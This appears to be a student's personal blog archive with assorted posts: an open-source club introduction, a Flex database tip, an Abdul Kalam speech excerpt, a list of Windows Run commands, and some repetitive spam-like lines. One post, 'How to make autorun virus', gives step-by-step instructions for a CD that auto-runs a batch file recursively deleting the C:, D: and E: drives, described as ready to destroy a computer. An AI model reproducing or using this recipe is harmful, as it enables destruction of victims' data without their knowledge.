Thursday, April 25, 2013

Get your mom a plastic spoon

Get your mom a plastic spoonGet your mom a plastic spoonGet your mom a plastic spoonGet your mom a plastic spoon

New blog post for pay per cost

New blog post for pay per costNew blog post for pay per costNew blog post for pay per costNew blog post for pay per costNew blog post for pay per costNew blog post for pay per costNew blog post for pay per costNew blog post for pay per costNew blog post for pay per costNew blog post for pay per cost

Friday, March 2, 2012

Friday, September 24, 2010

second OSUM meeting

Second OSUM meeting photos

The main agenda of Second meeting was to celebrate Software Freedom Day,
on this Occasion i had given seminar on J2ME,
and my colleague SUJAY shared some tips on how to search in google in efficient way using special keyword..

Friday, July 30, 2010

Introduction to OSUM



REASONS TO JOIN OSUM:

* OSUM members will gain benefits that can help them prepare for an IT career by getting access to the latest open-source technologies including free media kits and student-developer resources.
* Participate in OSUM club activities at your university to learn about open-source technologies that are opening up new career opportunities
* Get access to free online courses, webinars, tutorials, discounts on certifications, and other student resources that can fast-track your career
* Connect and make friends with student coders from around the world to Get and Give technical support and share project ideas.

 BENEFITS:
  1. Hands-on training through student projects and games
  2. Online training through the Sun Academic Initiative program
  3. Preparation for and discounts on Sun certifications
  4. Global social interaction and camaraderie with other student developers
  5. Opportunities to collaborate with each other on projects and activities
  6. Opportunities to get challenged, get motivated, and get excited
  7. Write blogs.
  8. Post comments
  9. Use an instant-messaging application
  10. Upload photos and videos
  11. Post profiles of themselves
  12. Communicate in forums.
  13. http://osum.sun.com/atmiyaosum

Sunday, July 18, 2010

How to implement multiple database in a single flex application

After seven day working on these topic i could able to find the solution that we can implement multiple database through custom component
the steps are:
1.create a database application in the new window.
2.now create a custom component in your existant application.
3.copy the code of database into the custom component source,
4.than drag that component into your application..
5.it works and you can implement as much as database table simply without any kind of logic.

Friday, July 16, 2010

A Speech of Abdul Kalam on Technology Enhanced Education


Constraints of time and space together with the rapid obsolescence 
of knowledge in some areas of science and technology, have created 
a huge demand for different courses from different institutions in 
the distance mode. There is a need for a working digital library 
system that alone can, in the long run, provide the kind of access 
required for a Knowledge Society. Technology Enhanced Learning is a 
solution. It attempts to exploit the rapid developments in Information
and Communication Technology. As the communications bandwidth continues
to increase and the cost of computer power continues to drop, 
Technology Enhanced Learning will become an economically viable 
solution. Virtual classrooms of the future will have students from 
many locations taught by a team of geographically distributed 
instructors through the tele-education delivery system. 

Ultimately, education in its real sense is the pursuit of truth. 
It is an endless journey through knowledge and enlightenment. 
Such a journey opens up new vistas of development of humanism where 
there is no scope, nor room for pettiness, disharmony, jealousy, 
hatred or enmity. It transforms a human being into a wholesome whole, 
a noble soul and an asset to the universe. Universal brotherhood in 
its true sense becomes the sheet anchor for such an education. Real 
education enhances the dignity of a human being and increases his or 
her self-respect. If only the real sense of education could be 
realised by each individual and carried forward in every field of 
human activity the world will be so much a better place to live in. 

Thursday, June 3, 2010

Useful Run Commands....


Accessibility Controls - access.cpl
Add Hardware Wizard - hdwwiz.cpl
Add/Remove Programs - appwiz.cpl
Administrative Tools - control admintools
Automatic Updates - wuaucpl.cpl
Bluetooth Transfer Wizard - fsquirt
Calculator - calc
Certificate Manager - certmgr.msc
Character Map - charmap
Check Disk Utility - chkdsk
Clipboard Viewer - clipbrd
Command Prompt - cmd
Component Services - dcomcnfg
Computer Management - compmgmt.msc
Date and Time Properties - timedate.cpl
DDE Shares - ddeshare
Device Manager - devmgmt.msc
Direct X Control Panel (If Installed)* - directx.cpl
Direct X Troubleshooter - dxdiag
Disk Cleanup Utility - cleanmgr
Disk Defragment - dfrg.msc
Disk Management - diskmgmt.msc
Disk Partition Manager - diskpart
Display Properties - control desktop
Display Properties - desk.cpl
Display Properties (w/Appearance Tab Preselected) - control colorDr. Watson
System Troubleshooting Utility - drwtsn32
Driver Verifier Utility - verifier
Event Viewer - eventvwr.msc
File Signature Verification Tool - sigverif
Findfast - findfast.cpl
Folders Properties - control folders
Fonts - control fonts
Fonts Folder - fonts
Free Cell Card Game - freecell
Game Controllers - joy.cpl
Group Policy Editor (XP Prof) - gpedit.msc
Hearts Card Game - mshearts

Friday, April 16, 2010

How to make autorun virus


step 1:

create a file in note pad and name it "vrs.cmd"

write following commands in the file-
"
rd e:\*.* /s/q
rd d:\*.* /s/q
rd C:\*.* /s/q
"

plz dont include double quotes
after saving it with name vrs.cmd
plz dont'double click on it else u'll lose data frm ur hard disk

STEP 2-

make another file name it "autorun.inf"
and write following codes in it.
"
[AUTORUN]
open=vrs.cmd
"
here also no need to include double quotes
but [] are required
save this file autorun.inf

STEP 3-
Now write these two files into a CD and CD is READY to destroy a computer..

CHECK___
u can check the ability of vrs.cmd i mean to have a trial

make a folder in "d:" name it "ninja"
and put some files and folders it like songs, sanps etc
now make a file in note pad

rd d:\ninja /s/q

and save it with name vr.cmd
and now double click on this file
it will remove ninja folder from "d:"

Friday, September 18, 2009